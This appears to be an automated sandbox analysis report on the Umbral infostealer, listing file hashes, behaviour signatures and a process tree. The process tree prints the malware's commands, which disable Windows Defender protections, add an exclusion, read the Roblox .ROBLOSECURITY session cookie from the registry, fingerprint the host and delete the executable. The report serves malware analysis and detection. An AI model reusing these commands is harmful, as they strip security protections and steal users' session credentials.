Analysis

  • max time kernel
    118s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    05-06-2024 01:52

General

  • Target

    Umbral.exe

  • Size

    227KB

  • MD5

    53681862212e052e3c6b3e9ca9594428

  • SHA1

    f89c700368b19d182062f673f9b51199e08c47cc

  • SHA256

    2576a8b91992cead33bc30b306852a6fbaa559fff89a534537495abe76aca3a2

  • SHA512

    2f9649751aeeabd4e59b7e172937518bb6867ce99eee00687243d6218edbdbc5d573a5cea36416131a3787360d215d557f91c75f480d30ce3d6bbd1152e81fa8

  • SSDEEP

    6144:+loZM9rIkd8g+EtXHkv/iD4M6Q2nLxCqV0QhTuOLQjb8e1mui:ooZOL+EP8M6Q2nLxCqV0QhTuOLKY

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:2356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1296
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2184
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2012
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:1936
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:308
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:1284
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2272
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • Runs ping.exe
          PID:2256

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      4f7255d09668512f5f9662ec37640cb5

      SHA1

      537dec1806be166705699e24f35d3c57daccd86e

      SHA256

      6360da0784b3c9f9ccc6a119f6e575ce5e4eae33d53a0c0a24f281ed62bc2e98

      SHA512

      73e97950cb1d3e0e07860c4556e75512f39e028800cea53f06ee5916c674086b89ca8d889e99f2eddf74ee2459e3883752bb80edc7302aa27958d469da004aa3

    • memory/308-50-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

      Filesize

      2.9MB

    • memory/2968-0-0x000007FEF5E63000-0x000007FEF5E64000-memory.dmp

      Filesize

      4KB

    • memory/2968-1-0x00000000012E0000-0x0000000001320000-memory.dmp

      Filesize

      256KB

    • memory/2968-2-0x000007FEF5E60000-0x000007FEF684C000-memory.dmp

      Filesize

      9.9MB

    • memory/2968-54-0x000007FEF5E60000-0x000007FEF684C000-memory.dmp

      Filesize

      9.9MB

    • memory/3000-13-0x000000000271B000-0x0000000002782000-memory.dmp

      Filesize

      412KB

    • memory/3000-11-0x000007FEEE260000-0x000007FEEEBFD000-memory.dmp

      Filesize

      9.6MB

    • memory/3000-12-0x0000000002714000-0x0000000002717000-memory.dmp

      Filesize

      12KB

    • memory/3000-15-0x000007FEEE260000-0x000007FEEEBFD000-memory.dmp

      Filesize

      9.6MB

    • memory/3000-10-0x000007FEEE260000-0x000007FEEEBFD000-memory.dmp

      Filesize

      9.6MB

    • memory/3000-14-0x000007FEEE260000-0x000007FEEEBFD000-memory.dmp

      Filesize

      9.6MB

    • memory/3000-9-0x0000000002790000-0x0000000002798000-memory.dmp

      Filesize

      32KB

    • memory/3000-8-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/3000-7-0x000007FEEE51E000-0x000007FEEE51F000-memory.dmp

      Filesize

      4KB

    • memory/3024-22-0x0000000001E80000-0x0000000001E88000-memory.dmp

      Filesize

      32KB

    • memory/3024-21-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

      Filesize

      2.9MB